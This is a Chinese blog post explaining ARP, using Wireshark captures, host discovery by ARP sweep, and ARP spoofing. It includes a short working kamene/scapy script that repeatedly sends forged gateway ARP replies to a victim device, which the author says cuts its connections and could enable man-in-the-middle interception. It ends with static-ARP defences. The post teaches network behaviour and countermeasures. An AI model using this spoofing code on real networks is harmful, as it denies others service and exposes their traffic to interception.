标签:就是 今天 目录 end shark 练习 不同的 不响应 weixin
高中的时候,学校有一个商店,会放开WIFI给偷偷带手机去学校的我们使用,但是因为人很多的关系,导致每次去下载东西都很慢
那时候,通过百度,知道了
WIFI KILLER
这样一款软件,可以让别人上不了网,不过随着各大厂商对系统的升级之后,这个软件就失效了,尤其是这个软件需要root权限,这个在现在多数手机来说已经不可能了。需要权限的原因就是需要发送原始套接字,但是这个套接字如果交给用户来发的话,太危险了,很容易扰乱底层的协议规则,这就导致必须要一定权限才能发送原始套接字(Windows好像不用)
ARP 协议是用来从从IP地址查询MAC地址的,所以,一次数据传输可能有这样一个ARP沟通过程
比如,这里我用我笔记本(192.168.2.2) Ping了一下我的手机(192.168.2.5) ,那么数据包就需要知道被发送到那个MAC地址,
然后接下来,数据包就可以发送大MAC地址是20:f4:78:e6:36:41的网卡上了
今天我才发现,我平时高冷的不得了的磊科NW737其实和他的小伙伴们沟通的热火朝天~~
____底层协议居然如此热闹
来自 wiki 百科
通过wireShark可以发现,如果我想知道这个局域网中有多少主机,或者想要局域网中所有主机的列表,那么我完全可以发送ARP请求包,对每个IP都询问一下MAC地址,有回应的,就是存活的主机。
这个方法比Ping扫描要稳一点,因为开了防火墙之后,很多电脑是不响应Ping包的
只要了解了ARP之后,就会发现有空子可以钻,也就是说,当有主机在局域网广播询问MAC地址的时候,直接发送一个错误的响应就好了
甚至,不需要他询问,直接发送响应包即可
from kamene.all import *
eth = Ether()
arp = ARP(
op="is-at",
hwsrc = "22:22:22:22:22:22",
psrc = "192.168.2.1",
hwdst="20:F4:78:E6:36:41",
pdst="192.168.2.7"
)
print((eth/arp).show())
sendp(eth/arp,inter=2,loop=1)
这里构造了一个ARP数据包
运行之后可以看到,
如果把上面的 22:22:22:22:22:22修改成我笔记本的MAC地址,那么我的电脑就会收到如下大量的包
如果我用手机此时打开一个网页 例如 39.106.164.33
那么就能看到,数据包发给了我的电脑,目的MAC是我的电脑,但是因为我的电脑没有对数据包进行相关处理,结果就导致连接失败等等问题
如果,我们能对这些包做出响应,那么就成了名副其实的中间人啦~
ARP表的老化时间
? 不同的系统对ARP表的老化时间设定不太一样,在Windows2000/XP环境中,ARP表项的老化时间是2分钟,95/98以及NT环境下为10分钟,在大部分Cisco交换机中,该值是5分钟,华为的设备一般为20分钟……这些值可以通过系统注册表或设备的某些命令进行设置,具体设置的命令和参数请自行参考相关文档。
ARP表老化时间定时器的重置
? 满足以下任一条件时,设备的ARP表项的老化时间定时器会重置:
1,设备相应的ARP表项更新时;
2.,设备调用(引用)ARP表项转发数据后。
管理员身份运行
netsh -c "i i" add neighbors 16 "192.168.2.1" "08-10-79-5f-98-e9"
16 是通过 arp -a
命令得到的接口号(下图 0x10 十进制是16),192.168.2.1是IP地址,后面是mac
具体参考: https://blog.csdn.net/weixin_42551781/article/details/88368031
root权限运行
arp -s 192.168.2.1 08-10-79-5f-98-e9
具体参考: https://blog.csdn.net/qq_29663071/article/details/53508319
准备开个新坑,用C++把当年手机上的wifi killer 实现出来,虽然已经有P2P终结者一类的软件了,但是拿来练习STL还是可以的
标签:就是 今天 目录 end shark 练习 不同的 不响应 weixin
原文地址:https://www.cnblogs.com/cjdty/p/12642644.html